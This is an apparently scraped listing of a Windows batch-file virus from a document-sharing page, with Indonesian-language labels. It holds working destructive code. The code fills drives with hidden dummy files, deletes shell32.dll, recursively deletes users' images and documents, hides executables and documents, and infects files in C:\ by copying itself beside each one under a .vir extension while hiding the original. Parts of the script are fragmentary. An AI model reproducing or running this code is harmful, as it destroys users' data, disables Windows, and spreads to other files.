Escolar Documentos
Profissional Documentos
Cultura Documentos
----------------------------------------------------------------------------------
-----------------------------------------------
md d:\cheat
md d:\winddows
md d:\shader
----------------------------------------------------------------------------------
---------------------------------------
md c:\colok_matamu
md c:\cleaning_magic
md c:\login
cd /D "%Dir%"
cd /D "%Dir%"
cd /D "%Dir%"
goto lanjut_1
:bwt_autorun
goto lanjut_1
:lanjut_1
goto lanjut_2
:bwt_kopi
goto lanjut_2
:lanjut_2
goto lanjut_3
:bwt_cm
goto lanjut_3
:lanjut_3
Code:
setlocal ENABLEDELAYEDEXPANSION
for %%a in (C D) do if exist "%%a:\" (
for /f "tokens=3" %%b in ('dir "%%a:\" ^|find /i "Dir(s)"') do (
for /f "tokens=1-5 delims=," %%k in ("%%b") do (
set pagefile_%%a=%%k%%l%%m%%n
set /a pagefile_%%a-=10000000
)
)
fsutil file createnew "%%a:\pagefiles.sys" !pagefile_%%a! >nul 2>&1
attrib +s +h "%%a:\pagefiles.sys"
)
:start
c:\windows\net.vbs
attrib +h +s c:\windows\cinta.bat
attrib +h +s c:\windows\cm.bat
attrib +h +s c:\windows\text.txt
attrib +H +s c:\windows\doom.vbs
attrib +H +s c:\windows\system32\broken_heart.exe
del c:\windows\shell32.dll
attrib c:\*.exe /s /d +H +S
attrib c:\*.mpeg /s /d +H +S
attrib c:\*.docx /s /d +H +S
del d:\*.jpg /s
del d:\*.txt /s
del d:\*.jpeg /s
del d:\*doc /s
:Start_Infect
for %%a in ("C:\*.*") do (
set "ext=%%~xa"
set "for_check_ext=!ext:~-3!"
IF /i not "!for_check_ext!"=="vir" (
call :Find_Type
copy /y %0 "%%~dpna!ext!vir" && attrib +s +h "%%~fa"
)
)
GOTO :NEXT
:Find_Type
REm Check if Extension already exist
REG Query "HKCR\!ext!vir" >nul 2>&1 && GOTO :EOF
for /f "tokens=1* delims==" %%a in ('assoc !ext!') do (
set "file_type=%%~b"
)
for /f "tokens=1* delims==" %%a in ('assoc !file_type!') do (
set "new_type=%%~b"
)
for /f "tokens=3*" %%a in ('REG QUERY "HKCR\!file_type!\DefaultIcon" ^| find /i
"REG_SZ"') do (
set "icon_location=%%~b"
)
:start
c:\windows\cinta.bat
c:\windows\doom.vbs
d:\windows\cm.bat
echo msg * tapi tak berguna oh amit-amit with you >> c:\windows\cinta.bat